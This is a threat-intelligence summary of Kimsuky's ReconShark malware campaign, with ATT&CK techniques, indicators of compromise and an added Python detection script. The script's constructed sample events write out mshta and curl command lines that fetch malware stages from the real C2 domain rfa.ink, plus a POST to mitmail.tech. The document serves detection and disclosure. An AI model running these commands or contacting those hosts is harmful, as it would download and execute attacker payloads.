Kimsuky Evolves Reconnaissance Capabilities in New Global Campaign

SentinelLabs reports ongoing Kimsuky operations using a new ReconShark component, delivered via targeted spear-phishing, OneDrive-hosted documents, and malicious macros. ReconShark functions as a reconnaissance tool that exfiltrates system and defense-detection information and communicates with a North Korea–linked infrastructure, underscoring a broader campaign pattern. Hashtags: #Kimsuky #ReconShark #BabyShark #KRG

Keypoints

  • Ongoing global campaigns by Kimsuky target think tanks, researchers, government entities, and related organizations across the US, Europe, and Asia, aligned with geopolitical topics such as China-North Korea nuclear agendas.
  • A new ReconShark component (a BabyShark reconnaissance variant) is deployed via spear-phishing and OneDrive-hosted documents, with macros triggering on document close.
  • ReconShark exfiltrates device information (running processes, battery status) and attempts to identify security tools present on the host.
  • It uses Windows Management Instrumentation (WMI) to gather information and checks for defense software such as ntrtscan, mbam, Norton Security, and Kaspersky.
  • Payload deployment is multi-stage, using scripts (VBS, HTA, Windows Batch), macro-enabled Office templates, and DLLs, with LNK edits and Office template replacements to execute code.
  • Malware infrastructure includes shared hosting (NameCheap) and C2 domains such as yonsei.lol, rfa.ink, and mitmail.tech, with beacons and redirects to legitimate sites as part of the command-and-control flow.

MITRE Techniques

  • [T1566.002] Phishing: Spearphishing Link – Spear-phishing emails with OneDrive links to download a document; “The lure email contained the OneDrive shared file link.”
  • [T1566.001] Phishing: Spearphishing Attachment – Password-protected document attachment containing a macro; “The file downloaded is a password protected .doc file named ‘Research Proposal-Haowen Song.doc’ (SHA1: 86a025e282495584eabece67e4e2a43dca28e505) which contains a malicious macro (SHA1: c8f54cb73c240a1904030eb36bb2baa7db6aeb01)”.
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – Macros embedded in Office documents used to deliver and execute payloads; “The lure documents Kimsuky distributes contain Microsoft Office macros that activate on document close.”
  • [T1023] Shortcut Modification – ReconShark edits Windows Shortcuts (LNK files) to launch legitimate browsers and run malicious code; “ReconShark edits Windows Shortcuts (LNK files) to the msedge.exe, chrome.exe, outlook.exe, whale.exe, and firefox.exe applications. When executed, these LNK files start the linked legitimate applications and execute malicious code at the same time.”
  • [T1221] Template Injection – Replaces the default Office template (%AppData%\Microsoft\Templates\Normal.dotm) with a malicious template hosted at the C2; “replaces the default %AppData%\Microsoft\Templates\Normal.dotm Office template, which opens whenever a user starts Microsoft Word, with a malicious Office template hosted at the C2 server.”
  • [T1105] Ingress Tool Transfer – The malware can directly download a payload from the C2 server; “the malware can directly download a payload from the C2 server using the curl utility.”
  • [T1059.003] Windows Command Shell – Deployment via Windows Batch scripts; “Windows Batch scripts” are used as part of the payload chain.
  • [T1059.006] VBScript – Deployment via VBScript payloads (VBS); part of the multi-stage approach.
  • [T1059.007] HTML Application – Deployment via HTA scripts; “HTA script” used as part of payload execution.
  • [T1047] Windows Management Instrumentation – ReconShark uses WMI to query system data; “ReconShark relies on Windows Management Instrumentation (WMI) to query process and battery information.”
  • [T1057] Process Discovery – ReconShark enumerates running processes as part of information gathering.
  • [T1082] System Information Discovery – Retrieves system information such as battery status to assess host capabilities.
  • [T1041] Exfiltration Over C2 Channel – Collected data is uploaded to the C2 server via HTTP POST requests; “uploads them to the C2 server by issuing HTTP POST requests.”
  • [T1027] Obfuscated/Compressed Files or Information – Some strings are encrypted with a simple cipher to evade static detection; “strings are encrypted using a relatively simple cipher to evade static detection mechanisms.”
  • [T1071.001] Web Protocols – Beacons and C2 communications occur over web protocols to domains like rfa.ink and mitmail.tech; “beacons are made to the /bio/ directory of rfa[.]ink” and similar patterns across C2 domains.
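The keypoints and the technique list above describe a chain a defender can look for in endpoint telemetry: an Office application spawning a script host, a non-Office process writing Normal.dotm, browser shortcuts rewritten by a script host, host profiling through WMI, and HTTP traffic to the listed C2 domains. The following Python is an added detection example and is not code from SentinelLabs or from this report. It runs a handful of rules over a constructed batch of Sysmon-style process, file and network events; the event field names (`type`, `image`, `parent`, `cmdline`, `target`, `dest_host`, `uri`) are assumptions standing in for whatever your EDR or SIEM emits, and the sample events are invented to exercise each rule. The C2 domains are taken from the report's indicator list and refanged for matching.

```python
import re
from pathlib import PureWindowsPath

# Domains from the report's IoC list, written defanged and refanged for matching.
C2_DOMAINS = {d.replace("[.]", ".") for d in ("rfa[.]ink", "mitmail[.]tech", "yonsei[.]lol")}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe", "curl.exe"}
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")

# Constructed sample telemetry (not real logs). Field names are assumptions.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "mshta.exe https://rfa.ink/bio/t1.hta"},
    {"type": "process", "image": r"C:\Windows\System32\curl.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": "curl -o C:\\Users\\u\\AppData\\Local\\Temp\\reg.vbs https://rfa.ink/bio/ca.php?na=reg.gif"},
    {"type": "file", "image": r"C:\Windows\System32\wscript.exe",
     "target": r"C:\Users\u\AppData\Roaming\Microsoft\Templates\Normal.dotm"},
    {"type": "file", "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "target": r"C:\Users\u\AppData\Roaming\Microsoft\Templates\Normal.dotm"},  # benign: Word itself
    {"type": "file", "image": r"C:\Windows\System32\wscript.exe",
     "target": r"C:\Users\u\Desktop\Google Chrome.lnk"},
    {"type": "process", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "wmic path Win32_Battery get BatteryStatus"},
    {"type": "network", "image": r"C:\Windows\System32\curl.exe",
     "dest_host": "mitmail.tech", "method": "POST", "uri": "/gorgon/r.php"},
    {"type": "process", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "chrome.exe"},  # benign browser launch
]


def basename(path):
    """Lower-cased file name of a Windows path, so comparisons ignore directory and case."""
    return PureWindowsPath(path).name.lower()


def rule_office_spawns_script_host(ev):
    # Macro-on-close execution shows up as Word/Excel/Outlook parenting a script host.
    return (ev["type"] == "process"
            and basename(ev["parent"]) in OFFICE_APPS
            and basename(ev["image"]) in SCRIPT_HOSTS)


def rule_normal_dotm_tampering(ev):
    # Normal.dotm is legitimately written by Word; anything else touching it is suspect.
    return (ev["type"] == "file"
            and basename(ev["target"]) == "normal.dotm"
            and basename(ev["image"]) not in OFFICE_APPS)


def rule_lnk_written_by_script_host(ev):
    # Shortcut edits to browsers/Outlook: a script host rewriting a .lnk file.
    return (ev["type"] == "file"
            and ev["target"].lower().endswith(".lnk")
            and basename(ev["image"]) in SCRIPT_HOSTS)


def rule_wmi_host_profiling(ev):
    # Only catches profiling done via wmic.exe; in-process WMI calls need
    # Microsoft-Windows-WMI-Activity logging instead (caveat, not covered here).
    return (ev["type"] == "process"
            and basename(ev["image"]) == "wmic.exe"
            and basename(ev["parent"]) in SCRIPT_HOSTS
            and re.search(r"win32_(battery|process)\b", ev.get("cmdline", ""), re.I) is not None)


def rule_known_c2_contact(ev):
    # Match the report's C2 domains in network destinations and in URLs on command lines.
    hosts = set()
    if ev["type"] == "network":
        hosts.add(ev["dest_host"].lower())
    elif ev["type"] == "process":
        hosts.update(h.lower() for h in URL_HOST_RE.findall(ev.get("cmdline", "")))
    return any(h == d or h.endswith("." + d) for h in hosts for d in C2_DOMAINS)


RULES = {
    "office_spawns_script_host": rule_office_spawns_script_host,
    "normal_dotm_tampering": rule_normal_dotm_tampering,
    "lnk_written_by_script_host": rule_lnk_written_by_script_host,
    "wmi_host_profiling": rule_wmi_host_profiling,
    "known_c2_contact": rule_known_c2_contact,
}


def detect(events):
    """Return (rule_name, event_index) pairs for every rule that fires on every event."""
    return [(name, i) for i, ev in enumerate(events)
            for name, fn in RULES.items() if fn(ev)]


if __name__ == "__main__":
    for name, idx in detect(SAMPLE_EVENTS):
        print(f"{name:28s} event[{idx}] {SAMPLE_EVENTS[idx]['image']}")
```

The rules are deliberately narrow so each maps to one technique in the list: the Normal.dotm rule allows Word itself, and the C2 rule checks command lines as well as network events because a `curl` download of the HTA or VBS stage surfaces the domain before any connection is logged. Domain matching is host-based only; if a campaign moves to new shared-hosting domains, the behavioural rules (Office spawning a script host, Normal.dotm written by a script host, a .lnk rewritten by a script host) still fire.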

Indicators of Compromise

  • [Domain] yonsei[.]lol – Phishing Email Sender Domain
  • [Domain] rfa[.]ink – C2 domain
  • [URL] https[:]//rfa[.]ink/bio/r.php – C2 endpoint
  • [URL] https[:]//mitmail[.]tech/gorgon/r.php – C2 endpoint
  • [URL] https[:]//rfa[.]ink/bio/t1.hta – ReconShark payload: HTA script
  • [URL] https[:]//rfa[.]ink/bio/ca.php?na=reg.gif – ReconShark payload: VBS script
  • [File Hash] 86a025e282495584eabece67e4e2a43dca28e505 – Lure Doc Example – SHA1
  • [File Hash] c8f54cb73c240a1904030eb36bb2baa7db6aeb01 – Macro – SHA1
  • [File Name] Research Proposal-Haowen Song.doc – Lure document

Read more: https://www.sentinelone.com/labs/kimsuky-evolves-reconnaissance-capabilities-in-new-global-campaign/